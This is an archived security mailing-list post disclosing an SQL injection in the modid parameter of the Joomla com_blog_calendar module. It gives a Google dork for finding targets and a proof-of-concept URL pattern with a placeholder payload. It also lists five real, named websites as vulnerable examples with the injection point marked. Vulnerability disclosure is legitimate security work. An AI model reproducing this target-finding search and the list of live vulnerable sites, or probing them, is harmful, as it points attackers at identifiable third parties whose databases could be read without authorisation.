Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 26 Dec 2016 16:08:45 +0700
From: "Steevee a.k.a Stefanus" <steevee.aka@...il.com>
To: oss-security@...ts.openwall.com
Subject: Joomla com_blog_calendar SQL Injection Vulnerability

==========================================================================================
Joomla com_blog_calendar SQL Injection Vulnerability
==========================================================================================

:-------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Joomla com_blog_calendar SQL Injection Vulnerability
: # Date : 26th December 2016
: # Author : X-Cisadane
: # CMS Name : Joomla
: # CMS Developer : http://joomlacode.org/gf/project/blog_calendar/
: # Category : Web Application
: # Vulnerability : SQL Injection
: # Tested On : SQLMap 1.0.12.9#dev
: # Greetz to : X-Code YogyaFree, ExploreCrew, CodeNesia, Bogor Hackers
Community, Borneo Crew, Depok Cyber, Mantan
:-------------------------------------------------------------------------------------------------------------------------:

A SQL Injection Vulnerability has been discovered in the Joomla Module
called com_blog_calendar.
The Vulnerability is located in the
index.php?option=com_blog_calendar&modid=xxx Parameter.
Attackers are able to execute own SQL commands by usage of a GET Method
Request with manipulated modid Value.
Attackers are able to read Database information by execution of own SQL
commands.

DORKS (How to find the target) :
================================
inurl:/index.php?option=com_blog_calendar
Or use your own Google Dorks :)

Proof of Concept
================

SQL Injection
PoC :
http://[Site]/[Path]/index.php?option=com_blog_calendar&modid=['SQLi]

Screenshot (PoC) : http://i64.tinypic.com/2rqhhk4.png

Example of Vuln Sites :
https://www.zen-road.org/index.php?option=com_blog_calendar&modid=['SQLi]
http://www3.unitus.it/index.php?option=com_blog_calendar&modid=['SQLi]
http://chausyleshoz.by/en/index.php?option=com_blog_calendar&modid=['SQLi]
http://www.foms.kg/index.php?option=com_blog_calendar&modid=['SQLi]
http://www.iab.com.bd/index.php?option=com_blog_calendar&modid=['SQLi]
... etc ...

-= Regards =-
 Steevee A.K.A

Content of type "text/html" skipped

View attachment "poc.txt" of type "text/plain" (2100 bytes)

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.